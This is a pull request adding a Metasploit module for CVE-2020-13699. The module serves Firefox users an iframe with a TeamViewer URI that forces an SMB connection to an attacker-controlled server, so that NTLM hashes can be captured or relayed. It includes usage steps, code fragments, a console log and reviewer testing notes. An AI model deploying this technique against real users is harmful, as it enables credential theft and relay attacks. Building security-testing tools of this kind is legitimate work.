### PR TITLE
TeamViewer URI SMB exploit (CVE-2020-13699)

### PR DESCRIPTION
**Pull request by h00die**
This adds an HTTP server which responds to Firefox (all other browsers aren't exploitable) with an iframe that will force TeamViewer to create an SMB connection to a server of our choice.  Exploits CVE-2020-13699.  This is an unbelievably simple exploit.
I can provide the Teamviewer 15.4.4445 installer binary if needed.

## Verification

- [ ]  Install the application
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/server/teamviewer_uri_smb_redirect`
- [ ] Do: `set SMB_SERVER [IP]`
- [ ] Do: `run`
- [ ] Start an SMB Capture or Relay server (such as responder)
- [ ] Open the URL on the target
- [ ] The SMB Server should receive a connection.

@jeffssh FYI.

I also wanted to note I emailed @jeffssh about this exploit with a question.  They answered back immediately and were super nice answering my questions, so just wanted to say thanks and show appreciation!

### CODE REVIEW

File: documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md [hunk 1]
```diff
@@ -0,0 +1,126 @@
...
+smb_server => 2.2.2.2
+resource (teamviewer.rb)> run -j
+[*] Auxiliary module running as background job 0.
+[+] Please start an SMB capture/relay on 2.2.2.2
+[*] Using URL: http://0.0.0.0:8080/IDGynsGNfXD5eFB
+[*] Local IP: http://1.1.1.1:8080/IDGynsGNfXD5eFB
+[*] Server started.
+```
+
+Start the SMB replay/capture
```
Comment (bcoles) [inline documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md:59]: Why not use `modules/auxiliary/server/capture/smb.rb` ?

File: modules/auxiliary/server/teamviewer_uri_smb_redirect.rb [hunk 2]
```diff
@@ -0,0 +1,92 @@
...
+      [
+        OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
+        OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
+        OptEnum.new('URI_HANDLER', [
+          true, 'TeamViewer URI Handler', 'teamviewer10', [
+            'teamviewer10',
+            'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
+            'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
+          ]
+        ])
```
Comment (bcoles) [inline modules/auxiliary/server/teamviewer_uri_smb_redirect.rb:54]: Is there a reason not to iterate through these creating an iframe for each? Concerned about popups?

File: modules/auxiliary/server/teamviewer_uri_smb_redirect.rb [hunk 3]
```diff
@@ -0,0 +1,92 @@
...
+    print_status("Request received for: #{req.uri}")
+
+    unless firefox?(req.headers['User-Agent'])
+      print_error('Target is not Firefox')
+      return
+    end
+
+    print_status("Sending TeamViewer Link to #{req.headers['User-Agent']}...")
+    send_response_html(cli, html_content)
+  end
```
Comment (bcoles) [inline modules/auxiliary/server/teamviewer_uri_smb_redirect.rb:86]: A `firefox?` method seems a bit redundant as a replacement for `include?`.

```suggestion
  def on_request_uri(cli, req)
    print_status("Request received for: #{req.uri}")

    ua = req.headers['User-Agent'].to_s

    unless ua.include?('Firefox')
      print_error('Target is not Firefox')
      return
    end

    print_status("Sending TeamViewer Link to #{ua}...")
    send_response_html(cli, html_content)
  end
```

File: documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md (hunk 1 above)
Comment (h00die) [reply documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md:59]: SMB3 **server** doesn't exist for msf yet, and win10 1909 only connected through that.

File: modules/auxiliary/server/teamviewer_uri_smb_redirect.rb (hunk 2 above)
Comment (h00die) [reply modules/auxiliary/server/teamviewer_uri_smb_redirect.rb:54]: Yup, exactly.

**Review by cdelafuente-r7 — CHANGES_REQUESTED** [review]
Thanks @h00die for this module. I just left a couple of small comments related to typos in the documentation.

**Comment by cdelafuente-r7** [comment]
This has been tested against Teamviewer v8.0.16642 and v15.4.4445. Both versions connect to the controlled SMB server as expected.

**Comment by h00die** [comment]
all done, added 8.0.16642 to the list of confirmed versions as well.

**Comment by cdelafuente-r7** [comment]
Thank you! I'll go ahead and land it shortly.

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
#Release Notes
This adds an exploit targeting an unquoted parameter call within the Teamviewer URI handler to create an SMB connection to an attacker controlled IP. This vulnerability is identified as CVE-2020-13699. By successfully exploiting this, an attacker would be able to capture the NTLM authentication contained in the request to retrieve passwords (hash cracking) or relay it (using a tool like responder) for code execution.

**Comment by pbarry-r7** [comment]
# Release Notes

New module <code>auxiliary/server/teamviewer_uri_smb_redirect</code> targets remote desktop software TeamViewer Desktop for Windows, creating an SMB connection with a vulnerable target via an unquoted parameter call within the
TeamViewer URI handler (<a href="https://attackerkb.com/topics/OQVSrAOTEg/cve-2020-13699?referrer=msfReleaseNotes">CVE-2020-13699</a>).

**Pull request merged**